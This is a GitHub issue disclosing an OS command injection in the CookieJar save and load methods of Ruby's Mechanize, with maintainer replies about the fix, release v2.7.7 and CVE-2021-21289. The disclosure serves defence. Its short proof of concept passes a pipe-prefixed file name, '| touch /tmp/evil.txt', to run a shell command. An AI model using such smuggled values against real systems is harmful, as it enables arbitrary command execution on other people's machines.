Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

save/load in Mechanize::CookieJar has OS Command Injection #547

Closed
kyoshidajp opened this issue Jul 20, 2019 · 3 comments · Fixed by #548
Closed

save/load in Mechanize::CookieJar has OS Command Injection #547

kyoshidajp opened this issue Jul 20, 2019 · 3 comments · Fixed by #548
Labels
topic/security

Comments

@kyoshidajp
Copy link
Contributor

save and load of Mechanize::CookieJar accept | as a file path. It leads to OS Command Injection.

How to reproduce

PoC of save is the following.

require 'mechanize'

url = 'https://example.com/'

agent = Mechanize.new
page = agent.get(url)
login_form = page.forms[0]
login_form.field_with(name: 'email').value = 'xxx'
login_form.field_with(name: 'password').value = 'zzz'
page = login_form.submit

agent.cookie_jar.save('| touch /tmp/evil.txt')

Then, /tmp/evil.txt will be created. load is the same.

Environments

  • Mechanize: master branch
  • Ruby: MRI (ruby 2.4.4p296 (2018-03-28 revision 63013) [x86_64-darwin17])
@kyoshidajp kyoshidajp mentioned this issue Jul 20, 2019
Merged
@flavorjones flavorjones mentioned this issue Jan 23, 2021
Closed
10 tasks
@flavorjones
Copy link
Member

See GHSA-qrqm-fpv6-6r8g for CVE assignment and public notice.

(That security advisory may not be public yet, but will be public once this fix is in a release.)

@flavorjones
Copy link
Member

Will be fixed in v2.7.7 shortly

@flavorjones
Copy link
Member

v2.7.7 has been released. Thank you again for reporting this! I've given you credit in the security advisory linked above. The CVE assigned is CVE-2021-21289.

@flavorjones flavorjones mentioned this issue Feb 1, 2021
Closed
@dependabot dependabot bot mentioned this issue Mar 15, 2021
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
topic/security
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Prevent OS command injection kyoshidajp/mechanize
2 participants
@flavorjones @kyoshidajp